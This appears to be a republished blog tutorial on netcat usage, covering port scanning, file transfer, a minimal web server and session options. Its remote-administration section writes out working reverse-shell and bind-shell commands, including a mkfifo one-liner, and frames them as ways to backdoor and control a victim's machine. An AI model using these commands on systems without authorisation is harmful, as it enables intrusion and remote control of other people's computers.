Netcat – Swiss Army Knife Pro Usage

29/12/2020
Chưa phân loại
Netcat is a utility which is used for reading and writing data across TCP and UDP ports. It can be used for a lot of cool stuff like file transfer, port scanning, port redirecting, backdooring someone else’s PC, making a simple chat program, for network troubleshooting and more, that’s why it’s known as swiss army knife. Also it comes pre-installed with almost every Linux distribution nowadays and it is mainly used by Network Administrators, DevOps and Security Engineers for their daily small tasks.

A brief difference between netcat-traditional and netcat-openbsd

There are two similar packages available for netcat with a slight difference between them.

netcat-traditional includes an additional ‘-e’ option which can be used for binding a program (i.e bash) with netcat. This feature is very useful for remote administration purposes.

netcat-openbsd have some additional support for IPv6 and proxies.

Netcat Installation

Though netcat comes pre-installed in most Linux distributions but if its not, it can be installed easily using the following commands.

For traditional package,

[email protected]:~$ sudo apt-get install netcat-traditional

For openbsd version,

[email protected]:~$ sudo apt-get install netcat-openbsd

Netcat for Windows can be downloaded from here https://sourceforge.net/projects/nc110/files/.

Now we’ll explore some interesting use cases of netcat

Port Scanning using netcat

To scan for open ports, use ‘-z’ option. Netcat will try to connect to every port without sending any data or very limited data in UDP case. Type the following

[email protected]:~$ nc -z -v hackme.org 80
…snip…
hackme.org [217.78.1.155] 80 (http) open

To scan for a range of ports, type

[email protected]:~$ nc -z -nv 192.168.100.72 2080
(UNKNOWN) [192.168.100.72] 80 (http) open
(UNKNOWN) [192.168.100.72] 22 (ssh) open

File Transfer with netcat

Another useful use case of netcat is file transfer between remote computers. You can send texts and binary files from one PC to another PC. We’ll try to send a file “file.pdf” from Linux PC to Windows PC [IP 192.168.100.72] using netcat as an example.

On Windows machine (receiver), type the following

C:Users> nc -nvlp 1337 > file.pdf
Listening on [0.0.0.0] (family 2, port 1337)

On Linux machine (sender), type the following

[email protected]:~$ nc -nv 192.168.100.72 1337 < file.pdf
Connection to 192.168.100.72 1337 port [tcp/*] succeeded!

Remote Administration with netcat

One of the best use cases of netcat is remote administration, that means you can control someone else’s PC using netcat. Netcat-traditional comes with ‘-e’ option which can be used to bind a program (i.e cmd.exe in Windows or bash in Linux) with a port, that means netcat will act as communicator between the program and the remote PC. Netcat will receive commands from remote PC, execute on local system and will send the results back to the remote PC. This feature is widely used for malicious purposes, to keep backdoors in PCs and servers. This feature is only available in netcat-traditional but with a little trick, netcat-openbsd can also be used for the same purpose. You can use two ways to control others’ PC.

In a Reverse Shell connection,  an attacker listens on a port and waits for a connection to be sent from the victim machine. It is used when victim computer is behind NAT or doesn’t have public IP.

To get a reverse shell using netcat, you need to listen on a port using netcat. Type the following on the attacker machine,

[email protected]:~$ nc -nvlp 1337
Listening on [0.0.0.0] (family 2, port 1337)

On victim machine (if netcat-traditional is installed)

//replace “/bin/bash” with “cmd.exe” in case of Windows

[email protected]:~$ nc -nv [IP_ADDR] 1337 -e /bin/bash

For netcat-openbsd (where “-e” option isn’t supported)

[email protected]:~$ rm /tmp/f;mkfifo /tmp/f;cat
/tmp/f|/bin/sh -i 2>&1|nc [IP_ADDR] 1337 >/tmp/f

While in a Bind Shell connection, attacker binds a port on the victim machine and connects to that port using client socket. It is used when attacker’s machine is behind NAT or doesn’t have a public IP.

On victim machine, type

[email protected]:~$ nc -nlvp 1337 -e /bin/bash
listening on [any] 1337

Now, to run commands on the victim machine, type

[email protected]:~$ nc -nv 127.0.0.1 1337
Connection to 127.0.0.1 1337 port [tcp/*] succeeded!
$ id
uid=1000(azad) gid=1000(azad) groups=1000(azad),4(adm),24(cdrom),27(sudo),
30(dip),46(plugdev),118(lpadmin),129(sambashare)

Simple Web Server using netcat

You can also do another simple trick to use netcat as minimal single page web server. This web server would be very simple with no special configurations, and we’ll use to it send our HTML code to the browser.

[email protected]:~$ while true ; do  echo -e "HTTP/1.1 200 OKnn $(echo "<h1>
My Simple Webserver using netcat</h1>")" | nc -nvlp 1337  ; done
Listening on [0.0.0.0] (family 2, port 1337)

Now, try to fetch the webpage using curl

[email protected]:~$ curl http://127.0.0.1:1337/
<h1>My Simple Webserver using netcat</h1>

Specify Timeout for a netcat Session

You can specify timeout for a netcat session using “-w” option. Netcat will automatically disconnect its session after the specified time passes out.

// -w [Time in Seconds]
[email protected]:~$ nc -w 40 -nvlp 1337
Listening on [0.0.0.0] (family 2, port 1234)

Continue Listening even if Client closes the Connection

In normal mode, netcat server shuts down and stop listening on the port when a client closes the connection. You can keep the server up using “-k” option

[email protected]:~$ nc -k -nlvp 1234
Listening on [0.0.0.0] (family 2, port 1234)

Conclusion

Netcat is simple yet efficient utility which can be used for a lot of simple daily tasks. It comes pre-installed in almost every UNIX like operating systems and can be used for various tasks like communication between two PCs, file transfer and many more.

ONET IDC thành lập vào năm 2012, là công ty chuyên nghiệp tại Việt Nam trong lĩnh vực cung cấp dịch vụ Hosting, VPS, máy chủ vật lý, dịch vụ Firewall Anti DDoS, SSL… Với 10 năm xây dựng và phát triển, ứng dụng nhiều công nghệ hiện đại, ONET IDC đã giúp hàng ngàn khách hàng tin tưởng lựa chọn, mang lại sự ổn định tuyệt đối cho website của khách hàng để thúc đẩy việc kinh doanh đạt được hiệu quả và thành công.
Bài viết liên quan

Top 10 Browser Extensions for Ethical Hackers

Ethical hacking is not just a single skill, it is a whole set of skills and among these skills includes the usage of different...
29/12/2020

Install OpenToonz Animation Maker 2D App on Ubuntu 17.04 & Below

OpenToonz Animation Maker is a free 2D animation software software that enables you to create 2D animations for movies or...
28/12/2020

How to Convert a PDF into a Set of Images

PDF to image file conversion methods are often used to convert an entire PDF or to extract images from a PDF file. These...
29/12/2020
Bài Viết

Bài Viết Mới Cập Nhật

Lý do tại sao bạn nên sử dụng proxy khi truy cập web đen
27/02/2023

Các lỗi thường gặp khi sử dụng proxy và cách khắc phục chúng.
27/02/2023

Tác động của việc sử dụng proxy đến tốc độ kết nối internet của bạn.
27/02/2023

Các tiện ích và công cụ để quản lý proxy.
27/02/2023

Các cách để kiểm tra tốc độ và độ ổn định của proxy.
27/02/2023